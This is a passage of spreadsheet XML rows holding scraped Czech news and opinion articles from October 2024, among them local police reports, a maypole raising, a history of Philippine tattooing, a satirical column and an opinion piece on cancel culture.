tak sedím kolem stolu s kamarády, plánujeme další akci, a já zjišťuji, že už tu máme celou skupinu pro důležitost souznění, která jednoho dne vyrostla z banálního unuděnému večeru na cosi neskutečně magického. Takže šup, chlapi! Už je čas zahodit stereotypy a naučit se konečně žít naplno, protože život není ani o tom, kdy, ale především o tom, co, s kým a za jakých podmínek – to všechno vám totiž dodá ten správný vibe! Nejnovější příspěvky Autor: Redakce Nezdrave.cz</t>
  </si>
  <si>
    <t>20241001_54_2996656222_4c85c6660018526493eb.html</t>
  </si>
  <si>
    <t>4c85c6660018526493eb</t>
  </si>
  <si>
    <t>Víno Rubinet 2022, pozdní sběr, Vinařství Kern</t>
  </si>
  <si>
    <t>Víno Rubinet 2022, pozdní sběr, Vinařství Kern /100 9. 7. 2024 „Ve vůni převládá tmavé peckové ovoce, přechází do chuti, která je plná. Dochuť je slušná, tříslo příjemné. Víno by si zasloužilo lepší korek, bylo to na hraně. Celkově Fratava od Lobkowiczů opět nezklamala.“ /100 12. 9. 2023 „ Víno karmínové barvy s vůní lesního ovoce a ostružin. V chuti je plné s tóny ostružiny a sladké koření. Dochuť je dlouhá s vyzrálými taniny.“ /100 8. 3. 2024 „Není "extrémně zajímavé", ale je to víno , které neurazí a splňuje to, co od kabinetního vlašáku člověk čeká.“ Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20241001_55_2996656306_5779e01b7eeb77300510.html</t>
  </si>
  <si>
    <t>5779e01b7eeb77300510</t>
  </si>
  <si>
    <t>Sedím u říčky Vrchlice nedaleko Kutné Hory</t>
  </si>
  <si>
    <t>Sedím u říčky Vrchlice nedaleko Kutné Hory a píšu si poznámky pro svůj již šestý román. Vybral jsem si opět téma historické – Arnošt z Pardubic . Říkám si, že po pěti románech jsem připraven na pořádnou výzvu. Přeci jen, Arnošt nebyl žádný obyčejný chlapík. První pražský arcibiskup, kamarád Karla IV. a v podstatě chlap, kterého byste chtěli mít v týmu, kdyby šlo o středověkou reformu církve. Sedím tady u potoka, poslouchám šumění vody a přemýšlím, co by si asi Arnošt myslel o tom, jak dnes píšeme o středověku. Možná by se zasmál, možná by nám doporučil spíše meditaci než psaní, kdo ví. Každopádně, než si tady začnu vykládat s vodním duchem o etice 14. století, podívejme se na zajímavou věc – prý jen kousek od tohoto místa vznikl text k písni „Kde domov můj“ od Josefa Kajetána Tyla. Ano, přesně tak, tenhle nenápadný kousek přírody byl svědkem něčeho velkého. Představte si Tyla, jak sedí u potoka, zírá na klidnou hladinu, možná do sebe hodí nějaký ten džbánek piva pro inspiraci, a najednou – bum! – hymna je na světě. Nebo to bylo trochu jinak? Možná si Tyl ve skutečnosti lámal hlavu, jak napsat něco, co lidi vezme za srdce. Možná ho to zrovna moc nebralo a myslel si: „Sakra, tohle je složitější, než jsem čekal. Co kdyby to bylo něco o řece… ne, to už mají Slováci. Co o lese? Ne, to už mají Švýcaři. A co prostě něco jednoduchého o domově? No jasně, to bude ono!“ A takhle, možná za zvuku cvrčků a šumění potoka, vznikla naše národní hymna. A teď tu sedím já, jen pár stovek metrů od místa, kde kdysi seděl Tyl, a přemýšlím, jak zachytit ducha Arnošta z Pardubic . Bude to dlouhá cesta – přeci jen psát o církevním reformátorovi není zrovna to samé jako napsat hymnu během odpolední procházky. Ale kdo ví? Možná mě právě tenhle potok inspiruje a za pár let si budou lidi říkat: „Jo, tady někde napsal Pavel ten šestý román o Arnoštovi… Škoda, že hymnu už máme.“ No, a pokud se nic z toho nestane, aspoň jsem měl pěkné odpoledne u potoka. A to se počítá! Autor: Pavel Hrejsemnou Autor Pavel Hrejsemnou</t>
  </si>
  <si>
    <t>28800</t>
  </si>
  <si>
    <t>21180</t>
  </si>
  <si>
    <t>20241001_56_2996716427_4cc53c87d678d9859449.html</t>
  </si>
  <si>
    <t>4cc53c87d678d9859449</t>
  </si>
  <si>
    <t>102: Mladí dospělí a nedospělí</t>
  </si>
  <si>
    <t/>
  </si>
  <si>
    <t>20241001_57_2997035314_19eb02dde3ba41cd1a1b.html</t>
  </si>
  <si>
    <t>19eb02dde3ba41cd1a1b</t>
  </si>
  <si>
    <t>Rozdíl mezi pohlavími je i ve slovní zásobě. Neradno podceňovat!</t>
  </si>
  <si>
    <t>Rozdíl mezi pohlavími je i ve slovní zásobě. Neradno podceňovat! Zásadní rozdíl mezi pohlavími je i ve slovní zásobě. Například v 46 letech mají dívky průměrnou slovní zásobu 95 600 slov, zatímco muži mají slovní zásobu 250 slov, a z toho 50 vulgárních, Jednoho dne jsem si uvědomil, že žiji s odbornicí na lingvistiku. Moje drahá žena, ačkoli se tím nikdy nechlubila, disponuje slovní zásobou, která by mohla klidně soupeřit s Oxfordským slovníkem. Já? Inu, podle posledních výzkumů prý disponuji asi tak dvěma sty padesáti slovy. A z toho padesát je nepublikovatelných. Vítejte ve světě rozdílu mezi pohlavími! Říká se, že ženy mluví víc než muži. Tento mýtus rozptýlím hned teď. Ženy nemluví víc. Ony prostě mluví barevněji. Když má moje žena vysvětlit, proč nedáme našeho psa na operaci kvůli jeho fobii z veterináře, dostanu složitý a komplexní výklad na úrovni doktorského studia psychologie zvířat. Já to zvládnu pěti slovy: „Ten pes se bojí, necháme ho bejt.“ Podle statistik mají ženy ve věku 46 let slovní zásobu o 95 600 slovech. A teď si představte, že vám z toho 95 tisíc umí předvést v jedné konverzaci. Když jsem se minule zeptal své ženy, co si myslí o politice, dostal jsem dvacetiminutovou analýzu zahraničního dluhu, sociální nerovnosti a etiky v moderní společnosti. A když se ona zeptala mě na stejnou otázku, moje odpověď byla prostá: „Na houby.“ My muži prostě používáme to, co potřebujeme. Nač se zbytečně unavovat množstvím výrazů, když nám stačí těch základních dvě stě padesát? A to ještě půlka z nich je výrazem pro části motoru auta, pivo a pro to, co si myslíme o fotbalových rozhodčích. Upřímně řečeno, v běžném životě mi stačí pět sloves a pár podstatných jmen: „Pojď, jdu, vem, dej, mám hlad.“ A pak tu máme těch padesát vulgárních. Není to tak, že bychom byli hrubí nebo nekulturní. Jenomže co jiného vám zbývá, když vám na dálnici podjíždí frajer ve Fabii a při parkování to narvete do kontejneru? To si přece nemůžete v klidu říct: „Tento manévr mě velmi mrzí.“ Ne, tam přijde na řadu hned ten sprostý padesátkový seznam. Efektivní, výstižné, vždy po ruce. Takže jak to shrnout? Ženy používají slova jako malíř barvy. Každá věta je umělecké dílo, komplexní a do detailu promyšlené. My muži? My jsme spíše minimalisté. Používáme slova jako nástroj, funkční, ostré a mnohdy vulgární. A co na tom, že naše konverzace připomíná spíš pokyny na stavbě než filozofickou debatu o smyslu života? Důležité je, že si nakonec rozumíme. A když ne, máme vždy připravený ten sprostý záložní plán. --------------------- (autorský satirický fejeton)</t>
  </si>
  <si>
    <t>407190</t>
  </si>
  <si>
    <t>407070</t>
  </si>
  <si>
    <t>20241001_58_2996525056_46a48bc02488462c39b4.html</t>
  </si>
  <si>
    <t>46a48bc02488462c39b4</t>
  </si>
  <si>
    <t>Májku vysokou 22 metrů se v Ostrožské Nové Vsi podařilo postavit i dešti navzdory</t>
  </si>
  <si>
    <t>Shrnutí Májku vysokou 22 metrů se v Ostrožské Nové Vsi podařilo postavit i dešti navzdory 1. 10. 202418:40 +12 Foto: televize TVS OSTROŽSKÁ NOVÁ VES - Ne ve všech obcích na Slovácku jsou hody spojené se stavěním máje. To bývá většinou spjato se svátkem lásky v měsíci květnu. V Ostrožské Nové Vsi ale vztyčují vysoký kmen také v předvečer Svatováclavských hodů. Více než tři desítky párů zdatných rukou se v pátek odpoledne pustilo do nelehké práce. Májka, jakou v Ostrožské Nové Vsi už dlouho neviděli, měřila letos dvaadvacet metrů. A aby to nebyla pro místní chasu příliš malá výzva, déšť a vítr ještě ztěžovaly už tak náročný úkol. „ Počasí nám dneska moc nepřeje, ale tak nemůže být furt jenom hezky. Naštěstí máme šikovné a ochotné chlapy, takže déšť nás nezastaví. Díky všem klukům kolem a celé chase jsme to zvládli a mája stojí, takže výborné,“ řekl po úspěšné misi starší stárek Jakub Botek. „ My jsme se snažil y povzbuzovat písničkam i a trochu do nich lít víno , aby se nám i jim trošku uvolnil stres.Musím se přiznat, že když se začala mája stavět, tak jsem byla trošku vystresovaná a nemohla jsem ani zpívat, jenom jsem se dívala, “ usmívala se starší stárka Denisa Andrýsková. Novoveská chasa se na hody připravovala od začátku července. A tak je jen dobře, že se i přes nepřízeň počasí podařilo máju coby symbol mládí, plodnosti a lásky vztyčit. Láska k tradicím, která je v obci v rozpuku, se tak mohla během hodového víkendu rozvinout do plné krásy. Autor: Martin Dudek Čtěte také Autor: Martin Dudek Autor person Martin Dudek Rubrika transition_slide Co se děje</t>
  </si>
  <si>
    <t>9690</t>
  </si>
  <si>
    <t>5840</t>
  </si>
  <si>
    <t>20241001_59_2996469235_81e1b09be94e6cde7031.html</t>
  </si>
  <si>
    <t>81e1b09be94e6cde7031</t>
  </si>
  <si>
    <t>Krádeže i poskytnutí první pomoci. Městská policie v Chebu minulý týden řešila více než 300 událostí</t>
  </si>
  <si>
    <t>Krádeže i poskytnutí první pomoci. Městská policie v Chebu minulý týden řešila více než 300 událostí Městská policie v Chebu má za sebou opravdu nabité dny. Jen za minulý týden řešili strážníci více než 300 událostí. Byly mezi nimi dopravní přestupky, krádeže, výtržnictví i nutnost poskytnout první pomoc. Městská policie v Chebu za minulý týden přijala celkem 111 oznámení na tísňovou linku a z vlastní iniciativy řešila dalších 296 událostí. Mimo jiné jich dvanáct bylo proti veřejnému pořádku, dvě porušení obecně závazných vyhlášek a jedna krádež. Nechyběly ani přestupky proti pravidlům silničního provozu, kdy jich strážníci řešili celkem 139. „Řidič malého motocyklu si chtěl zkrátit cestu v ulici 26. dubna. Se svým motocyklem se vydal v protisměru jednosměrnou komunikací. Neušel pozornosti strážníků, kteří jeho zkratku přerušili. Při jednání o přestupku byl z dechu muže cítit alkohol , proto byla provedena dechová zkouška. Řidič nadýchal 2,21 promile alkoholu v dechu, a po opakované zkoušce již 2,31 promile. Pro podezření ze spáchání trestného činu byl řidič předán Policii ČR,“ popsal jeden z incidentů Pavel Janošťá k, ředitel Městské policie Cheb. Ten také informoval, že městští strážníci v uplynulém týdnu poskytovali dvakrát první pomoc. „Jednou pomohli muži, který upadl na nástupišti a zlomil si ruku, podruhé to bylo muži, který uklouzl na mokré dlažbě před galerií a způsobil si krvácející zranění hlavy. Oba zranění byli následně předáni záchranné zdravotní službě,“ uvedl Janošťák. Autor: external Rubrika transition_slide Zprávy</t>
  </si>
  <si>
    <t>19140</t>
  </si>
  <si>
    <t>21130</t>
  </si>
  <si>
    <t>20241001_6_2998114959_305b273489410bafec1c.html</t>
  </si>
  <si>
    <t>305b273489410bafec1c</t>
  </si>
  <si>
    <t>Podívejte se: Středeční noc v Kladně patřila evropské literatuře</t>
  </si>
  <si>
    <t>Podívejte se: Středeční noc v Kladně patřila evropské literatuře Oproti loňskému ročníku, kdy byla jednotlivá čtecí stanoviště příliš vzdálena, se letos knihovna rozhodla zvolit místa blíže k sobě, aby účastníci mohli pohodlně navštívit všechna stanoviště. Kromě osvědčené synagogy, která uzavírala putovní literární okruh, knihovna oslovila komunitní klub Pod Třešní a kavárnu DomaBar. play_fill Čtenář reportér Díky finanční podpoře Statutárního města Kladno byl letošní program obohacen o známé osobnosti. V DomaBaru se návštěvníkům představil herec Ondřej Lechnýř , v synagoze četla herečka Jaromíra Mílová z kladenského divadla a v klubu Pod Třešní zazněl hlas Milana Iléše. Knihovna sama pak nabídla pětičlenný tým knihovníků, kteří zdramatizovali úryvek z knihy Tommyho Barnese Pivo na Loiře . Každé literární čtení bylo proloženo hudebním programem. Netradičně na půdě knihovny vystoupila písničkářka Žofie Kabelková , Pod Třešní zněly písně Karla Kryla v podání Johnyho Černohorského, v synagoze se žáci představili s doprovodem Jana Klementa, a v DomaBaru zahrála ZUŠ Stochov spolu s klarinetistou Josefem Brandlem. Letošní Noc literatury v Kladně tak nabídla unikátní kulturní zážitek, který propojil literaturu, hudbu a společenský život v srdci města. Autor: Daniela Martinovská Autor person Daniela Martinovská</t>
  </si>
  <si>
    <t>10620</t>
  </si>
  <si>
    <t>7980</t>
  </si>
  <si>
    <t>20241001_60_2996423556_412505d69914cc562456.html</t>
  </si>
  <si>
    <t>412505d69914cc562456</t>
  </si>
  <si>
    <t>Stonožky vytetované lovcům hlav. Lidé Filipín se tetují nejméně tisíc let, dokládají mimojiné mumie</t>
  </si>
  <si>
    <t>Stonožky vytetované lovcům hlav. Lidé Filipín se tetují nejméně tisíc let, dokládají mimojiné mumie Původní Filipínci mívali působivou vizáž. Těla Kalingů, Bontoků, Igorotů i dalších zdobily bohaté ornamenty – muži si je museli zasloužit bojem, ženy a dívky zase plněním rolí. Během pár minulých dekád tradiční tetování batók ožilo a stává se též cílem „etnoturistiky“. Jsou to stovky ostrovů v jihovýchodní Asii . Říkáme jim od roku 1543 Filipíny ( Las Islas Filipinas nebo ostrovy Filipovy), které se dělí na tři hlavní rozlehlé části: jižní Mindanao , ústřední Visajské ostrovy a severní, největší Luzon . Na členité souostroví doplul již v roce 1521 koráb s italským mořeplavcem ve španělských službách Antoniem Pigafettou , jenž se plavil s Magalhaesem na první cestě kolem světa. A na ostrovech Svatého Lazara, jak místo nazvali, vídali věru zajímavé lidi! V poledne 22. března toho roku připluly k jejich lodi dvě bárky „Filipínců“, kteří Evropanům nabídli kokosy, pomeranče, nádobu s palmovým vínem a živého kohouta. Peršany, jež dobyly svět. Hrají svoji vlastní ligu, za některé vysázíte i tisíce dolarů „Chovali se mile a my jsme od nich všechno koupili. Jejich vůdcem byl starý pomalovaný muž se dvěma zlatými kruhy v uších. Jiní zase měli zlaté náramky nebo kruhy na pažích (...) Za ostrovem, kde jsme kotvili, žijí lidé, kteří mají tak velké díry v uších, že se jimi dá prostrčit ruka. Chodí nazí, jen ohanbí si zakrývají kusem plátna, pleť mají olivovou. Všichni se zdobí malováním ,“ zní první popis obyvatel Filipín . Antonio Pigafetta se pak krátce setkal i s dalším „králem“, patrně náčelníkem z pobřeží ostrova Mindanao , jenž „voněl, měl olivovou pleť a byl celý pomalovaný“. Tetování Právě tak, Los Pintados neboli Pomalovaní , se různým etnikům z Filipín říkalo i dlouho poté, byť příchozí brzy zjistili, že malůvky jsou to pohříchu trvanlivé. Jak vypadaly, tušíme i díky obrazu „malovaných Visájců“ z Codexu Boxer , který vznikl kolem roku 1590. Zjevně tetovaní lidé měli čáry či klikatice po těle a na údech (zepředu i zezadu, jak je vidět níže), zdobily je hvězdicovité ornamenty na hrudi i hýždích. A roku 1609 Antonio de Morga ve své historii Filipín konečně uvedl, že tamní lidé a „jejich důležitější mužové si pícháním poznačují celé tělo“. Misionáři „zohavování“ zakazovali – a postižené marně omývali svěcenou vodou. Mumie s pokreslenými údy Tetování je na Filipínách prostě doma. Tetovala se tam většina kultur, každá měla svůj styl a symboliku, ale výjimečného umu a rozsahu dosáhly kmeny z Luzonu . V tamních horách, po španělsku Kordillerách , žily drsné kmeny, které praktikovaly i lov lebek: Kalinga , Bontok, Ifugao či Igorot, což býval po conquistě i název pro veškeré „divochy z hor“. Regály plné lebek. Když Papuánci viděli, že staré rituály nefungují, své umění plné duchů a mrtvých předků opustili Pro tamní tetování existuje obecnější pojem batok či batek (“udeřit, ťukat“) s řadou výslovností a variant, takže Kalingové říkali zákrokům batók , Bontokové fatek , Ifugaové bátok a Ilokané, Lepantové, Itnegové a Ibalojové bátek . Posledně jmenovaní, Ibaloi, mívali v západní provincii Benguet ještě jeden s tetováním spojený termín. A sice burik , což značí osobu, která „je potetovaná po celém těle“. Tato tatuáž, sloužící jako statusový symbol, doklad statečnosti, bolestivý obřad přechodu i ochranný amulet, je až překvapivě dobře doložena. Proč? Ačkoli tetování Ibalojů „vyhynulo“ na konci 19. století, kdy ještě celotělový burik v terénu spatřil a zakreslil Hans Meyer , mají vědci o mnoho starší materiál k bádání. Jsou jím takzvaně ohnivé mumie od Kabayanu v oblasti Benguet, jichž byly stovky, ale dodnes (i po zničení a rozkradení hrobů v jeskyních) se jich dochovalo pár desítek; spekuluje se asi o padesáti až osmdesáti exemplářích, jejichž přesné lokalizace vědci raději neuvádějí. Těla v rakvích pocházejí z 12. až 19. století. Zvláště zajímavá jsou celotělová tetování, burik , ve známém stylu Ibaloi, jímž se předkové horalů ozdobili. Mumie, do jejichž útrob byl vlit slaný roztok (!) a které pak byly sedící sušeny nad ohněm, mají na sobě cikcakovité čáry, proužky na lýtkách či loktech, sluneční ornamenty a muži i měsíčkovou hrudní „zbroj“, pomyslné pláty sahající až na záda. To ostatně odpovídá tomu, co viděl roku 1882 Meyer , když psal, že „místní muži i ženy jsou tetováni složitými modročernými vzorci na zápěstích, rukou, hrudích a nohách“, jak ukazuje i jím pořízená pérovka. Ještě pár let nato uváděl inženýr Frederic Sawyer, jenž žil čtrnáct let na Luzonu , jak jen „stěží najdete muže či ženu, již by neměli na hřbetu dlaní obrazec slunce, neb ve středním Benguetu jej uctívají. Někteří si tetují hrudě a paže své rovnými i křivými čarami za pomoci jehel s indigovou modří. A Burik-Igoroti tetují svá těla podivuhodným způsobem, což jim dodává vzezření osob oděných v drátěnou zbroj...“. Vlna se v Andách přede, barví i tká 5000 let. Inkové si jí cenili víc než zlata, Španělé v plátnu vybírali daně Co na to dnešní vědci? Nacházejí s mumiemi značné shody! Jedna z nejlépe dochovaných, zvaná Apo Anno (jako lidový hrdina), je stará 700 až 900 let, nese nejen popsané tetováže, ale též antropomorfní prvky ( to-o , lidí). Mnohé z mumií ohledala Analyn Salvador Amoresová, dle níž jsou i po stovkách let viditelné geometrické, ale i figurální motivy jako typické stonožky (kamajan) , hadi (oleg) či ještěrky (batingal) , jež Ibalojové považovali za mocná stvoření a posly božstev. „Můj etnoarcheologický výzkum ukázal, že na mumiích z Kabayanu byla i ,nedokončená tetování’. Zdá se, že byla teprve roztetována, neboť dotyčný dříve zemřel,“ uvádí Amoresová v monografii Ancient Ink (2017). Lidé Ibaloi zvyk tetování – spjatý s lovem lebek – pod tlakem křesťanství a úředních zákazů opustili, ovšem možná nešlo jen o tisíciletou, ale daleko delší tradici. V oblasti pohoří, jež obývali, v jeskyni Arku , bylo archeology objeveno pravděpodobné tetovací nářadíčko: hřebínek a dvě dlátka z rohoviny. Stáří? Užívalo se v době mezi lety 370 před Kristem a 220 našeho letopočtu. Vlastnosti tetovaného hmyzu Hojně vzorovaní Filipínci neohromovali jen v místě. Jednoho obyvatele, jenž byl přezdíván „princ Giolo či Jeoly“, zakoupil korzár William Dampier na Mindanau (zřejmě pocházel z ostrůvku Meangis v provincii Sarangani) a v září 1691 ho dopravil do Londýna coby živou kuriozitu. Tam jej ukazoval i králi; Londýňané si Giola chodili prohlížet do podniku ve Fleet Street. V marketingovém – jistě notně přibarveném – příběhu zaznívalo, že žil na maličkém ostrově jako syn „rádži“, vládnoucího třiceti mužům a stu ženám. „Nesmývatelnou malbou z bylin“ jej prý potetovala žena: „Byl pomalován od prsou dolů, záda mezi lopatkami; na stehnech; měl široké pásky či náramky kolem paží a nohou... Vyobrazení byla zvláštní, plna rozličných čar a kostek, ale v elegantním tvaru,“ uváděl Dampier . Zvědavcům tvrdil, že vzory ho mají „chránit před jedy všeho druhu“, nezachránily jej ale před neštovicemi. Princ Giolo alias Jeoly, jedna z prvních tetovaných atrakcí Evropy , v Oxfordu zemřel. Obecně vzato však lidé Filipín svým tatuážím vskutku přisuzovali magické a ochranné významy. Zmínění Ibaloi věřili, že kérky – vypíchávané tlukotem dřívka na sadu několika jehliček nebo citronové trny – prodlužují život (později doufali, že vyléčí právě i ty neštovice, jež domorodce kosily). Motiv hada byl spjat s duchy, preventivní magií a s vírou v posmrtný život, znaky slunce ( akew ) zase bývaly posvátnými symboly souvisejícími s pohřebními rituály a prokazovaly se jimi duše při cestě do zásvětí. „Co u nás ten blbec vlastně chce?“ Poldi Pospíšil byl první běloch, jenž se od papuánských domorodců vrátil živý Pro filipínská etnika – Kalinga , Bontok-Igorot či Ifugao – byly typické symetrické čárové motivy a stylizované stonožky ( ginaj’ gajaman ) na hrudníku, zádech a pažích, jež bývaly jemně vypíchány. Přímo u Kalingů měly čárovité stonožky v bezpočtu variant zpracovány nejen drobné články, nohy, ale na konci též hlavičky, přičemž se podobné vzorky stáčely i na kalingských štítech. „Stonožky byly považovány za jedny z ,přátel válečníků’, spirituální a ochranné průvodce. Když se vtetovávaly do těla, bojovník věřil, že získává vlastnosti tohoto hmyzu: měl se pohybovat rychleji a byl agresivní jako tento predátorský živočich; zprvu zarudlé i černé tetování jej s ním vizuálně sbližovalo. Pro Kalingy se agresivita pojila s červení, se sílou, ambicí a úspěchem,“ vysvětluje v knize Kalinga Tattoo (2010) antropolog Lars Krutak , největší expert na dějiny nativních tetování. Potřeba hlav Tradičně si muži Kalingů mohli obstarat batók až po nějakém boji. Kérky měly pět raných stupňů: za zranění soka, za statečnost, za odnětí spodní čelisti ( samí , dělaly se z nich i držáky gongů!), za celou hlavu ( maniwat ) a za vážný zásah těla. Zvláštní tatuáží bývaly oceněny taky ženy, jež zásobovaly muže na výpravě. Lov lebek nebyl tak masivní, jak se soudilo: největší zabiják měl roku 1900 třináct ulovených nepřátel, další dva po osmi. Ženy se od třinácti let zdobily kvůli krášlení (hlavně na rukách), dále s postupujícím věkem i za plnění rolí. A samy tetovaly. Více než stoletá tatérka Whang-od ze vsi Buscalan užívá dosud poklepávací techniky a trnů (s 90 až 120 vpichy za minutu) a stala se „etnoturistickou“ celebritou – loni se dostala na obálku Vogue ! I díky ní kalingské tetování ožilo, nosí jej dnes filipínští emigranti v Americe a Evropě , vznikají i oděvy s „kérkami“. A jeden z tatérů, Ellen Festin, s hrudním tetováním ( bikking ) říká: „Máme nádhernou tradici, která mizí. Přirovnávám se k modernímu lovci hlav, protože naháním hlavy, které o našem umění vzdělávám, jak jen to jde.“ Autor je vědecký novinář, působí na Univerzitě Karlově . Vydal knihu Dějiny lidí (2022). Autor: Martin Rychlík Autor Martin Rychlík</t>
  </si>
  <si>
    <t>70530</t>
  </si>
  <si>
    <t>52730</t>
  </si>
  <si>
    <t>20241001_61_2996656333_e6b5823af0b5d88763b0.html</t>
  </si>
  <si>
    <t>e6b5823af0b5d88763b0</t>
  </si>
  <si>
    <t>Co můžu ještě&amp;nbsp;říci?</t>
  </si>
  <si>
    <t>Shrnutí Co můžu ještě&amp;nbsp;říci? 🇩🇪 Sie können diesen Artikel auch auf Deutsch lesen: Was darf ich noch sagen? Západní Berlín , 1986. V nejlepší náladě sedím se svými německými přáteli v baru na Fasanenstrasse a vyprávíme si vtipy. Přidávám klasický český repertoár a začínám známými slovy: Kohn říká Roubíčkovi. Tváře mých společníků se začínají mračit. Danuš, mluv tiše. Nemůžeš o Židech mluvit tak nahlas. Bylo to poprvé a na dlouhou dobu naposledy, kdy jsem měla zakázáno říkat něco nahlas. Po třiceti letech se seznam nežádoucích slov téměř přes noc rychle rozšířil. Přicházejí první uprchlíci a zanedlouho už není snadné nahlas říci, zda jsem pro, nebo proti jejich přijetí. Ale to byl jen začátek. V éře covidu se lidé neodvážili ani nejbližšímu příteli říct, že nejsou očkovaní, protože se s nimi okamžitě zacházelo jak s malomocnými. Korona přinesla i staronový fenomén: Stále více občanů začalo denuncovat jiné občany. Síly zákona a pořádku čelily silné vlně často anonymních udání lidí, kteří měli porušit pravidla koronaviru. A nejen to. Současná vláda si tento systém oblíbila. Nyní se můžou, ba musí udávat lidé oficiálně. Nový Zákon na ochranu oznamovatelů ukládá firmám povinnost zřídit centra pro nahlášení trestných činů. Oznamovatelé mohou zůstat v anonymitě, falešná oznámení zůstávají bez trestu. Přibližně 90 000 podniků a tisíce veřejných institucí musí od července 2023 zřídit tzv. ohlašovací centra. Pokud tak neučiní, mohou dostat pokutu až 20 000 eur. Z velké části bez povšimnutí veřejnosti tak vzniká nový, obrovský vyšetřovací aparát, který není zakotven ani v německé ústavě, ani v ústavě spolkových zemí. Někdy postačí jen jedno „špatné“ slovo… „O čem člověk nemůže mluvit, o tom musí mlčet.“ Tímto slavným orákulem zakončil před sto lety knihu Tractatus logico-philosophicus rakouský filozof Ludwig Wittgenstein . Dnes je jeho věta jedním z okřídlených slov principu myšlení a její tvůrce jedním z nejvýznamnějších a nejvlivnějších filozofů 20. století. Lidé však nemlčí. A tak narůstá doba nejistoty a úrodná půda pro zájmy jednotlivců či menších skupin je často líhní zuřivého odporu. Vyhlásili válku konsensu – spoléhají na vlastní zdroje informací a vlastní interpretace, které nejsou a nemohou být vždy správné. Fake je všudypřítomný, umělá inteligence pomáhá vytvářet ještě větší zmatek. Každý, kdo si přečetl článek na internetu, je dnes odborníkem a ví nejlíp o klimatu, nemocech, válce, politice, a dokonce i o tom, jak by bylo lepší vstřelit gól. Dnes je tolik kontroverzí, až se zdá, že nějaká zlá síla činí lidem požitek hádat se. Opakují se narativy mocných a vytváří se nálada proti těm, kteří mají jiný názor. Klimatičtí aktivisté malují na zeď scénář soudného dne, pochybovači, či dokonce odpůrci jsou kategoricky odmítáni. Jak málo dnes stačí k tomu, aby byl člověk označen za pravičáka. A odkdy se stane konspiračním teoretikem? Raději se neptejte… Je snadné nechat se zatlačit do pravicového kouta, ale je těžké se z něj dostat. Pod dohledem hnutí Woke and Cancel Culture se některé knihy, písně i kulturní přivlastňování dostaly do centra pozornosti ve světě. Winnetou je kritizován za koloniální předsudky, Pipi Dlouhá punčocha a Jim Knopf za rasismus. V některých amerických regionech byla zakázána Červená karkulka. Důvodem nebylo podříznutí živého zvířete, ale láhev vína , kterou karkulka nese v košíku jako dárek pro babičku. Influencer Will Witt pracuje od roku 2018 pro americký kanál PragerU, kde moderuje pořad Man on the Street. Během několika let zde dosáhl více než 700 milionů online zhlédnutí, a to díky otázkám o indoktrinaci. Oblékne se například do tradičních čínských nebo mexických kostýmů a ptá se studentů v Kalifornii , co si o jeho stylu oblékání myslí. Reakce jsou negativní, obecně je označován za kulturně nevhodného. Když však stejnou otázku položí místním obyvatelům v čínských nebo mexických čtvrtích, je oslavován a dostává palec nahoru. Gender dnes hraje rozhodující roli, názory na genderově vhodný jazyk se však rozcházejí. Genderismus versus genderová mánie dominují všem médiím. Pak jsou tu zakázaná slova kvůli rasismu, sexismu a dalším -ismům. Dnes je jejich seznam pestrý jako duhová vlajka: slova jako neger, mouřenín, jezdit načerno, zákusek indiánek, pizza Havaj , Polacke (označení pro Poláky) nebo cikán jsou společensky nekonformní. Ale také oslovení „slečna“ – jako by teprve manželství dělalo ženu ženou; tento termín byl proto v roce 1972 zrušen. V TV zprávách Tagesschau bylo slovo „matka“ nahrazeno slovem „rodička“. Logicky je pak muž/otec „plodící osobou“. Žijeme v době překotných změn, které mohou být někdy děsivé. Přesto se nacházíme na vrcholu naší civilizace. Proč tomu tak je? Udělali jsme něco špatně, nebo je to jen další krok ve vývoji lidstva? Odpověď neznám. Ale často přemýšlím, jak by se v tomto světě cítil můj dědeček. Byla jsem ještě malé dítě, když mi jednou řekl své tajné přání: „Chtěl bych se za sto let na krátkou dobu vrátit na Zemi.“ Jak by se mu zde asi líbilo po necelých padesáti letech? A tak si ho představuji, jak si vykračuje s čerstvě vyleštěnými botami do své oblíbené restaurace U Mouřenína, objednává si u slečny pikantní cikánský řízek a ke kávě, samozřejmě s pravým mlékem, si vychutnává indiánka. Se svým rošťáckým úsměvem říká: „Máte se dobře, jste na tom líp, než jsme byli my.“ Vezme do ruky časopis N&amp;amp;N a přečte si tento článek. Autor: Danuše Siering Autor person Danuše Siering</t>
  </si>
  <si>
    <t>709</t>
  </si>
  <si>
    <t>601</t>
  </si>
  <si>
    <t>20241001_62_2996441386_654a03dcd6273b3b571e.html</t>
  </si>
  <si>
    <t>654a03dcd6273b3b571e</t>
  </si>
  <si>
    <t>Vývoj bojů (950.&amp;nbsp;den): Novináři napočítali už skoro 500&amp;nbsp;obětí, které v&amp;nbsp;Rusku...</t>
  </si>
  <si>
    <t>Vývoj bojů (950.&amp;nbsp;den): Novináři napočítali už skoro 500&amp;nbsp;obětí, které v&amp;nbsp; Rusku ... Vývoj bojů (950. den): Novináři napočítali už skoro 500 obětí, které v Rusku po návratu z fronty zavraždili nebo těžce zranili vojáci – většinou bývalí trestanci. Oběťmi se stávají zejména jejich příbuzní, známí nebo sousedé. Většinou je v pozadí násilí také alkohol . Autor: Marie Dámková Autor Marie Dámková Rubrika transition_slide Hlavní</t>
  </si>
  <si>
    <t>66040</t>
  </si>
  <si>
    <t>73860</t>
  </si>
  <si>
    <t>20241001_63_2996427119_eab4d29d7dd741ec144a.html</t>
  </si>
  <si>
    <t>eab4d29d7dd741ec144a</t>
  </si>
  <si>
    <t>Probudili muže na lavičce a vrátili mu telefon. Ukrást ho nikdo nestihl</t>
  </si>
  <si>
    <t>Probudili muže na lavičce a vrátili mu telefon. Ukrást ho nikdo nestihl V pátek 27. září ve dvě ráno kontrolovala hlídka městské policie Lannovu třídu. Mluvčí strážníků Věra Školková uvedla, že strážníci na jedné z laviček uviděli ležícího mladíka. „Bylo zjevné, že nocležník nedorazil do své postele kvůli množství vypitého alkoholu . Strážníci navíc pod lavičkou našli jeho mobil, který vytratil z kapsy. Po probuzení mu pomohli na nohy a předali mu telefon,“ popsala mluvčí. Mladý muž byl po krátkém spánku schopen vlastní chůze, strážníci ho proto nasměrovali k jeho bydlišti. Autor: Markéta Trubková Autor person Markéta Trubková</t>
  </si>
  <si>
    <t>16690</t>
  </si>
  <si>
    <t>12930</t>
  </si>
  <si>
    <t>20241001_64_2996280448_4df196ebe459787bfb7c.html</t>
  </si>
  <si>
    <t>4df196ebe459787bfb7c</t>
  </si>
  <si>
    <t>Ostrov kousek od Afriky</t>
  </si>
  <si>
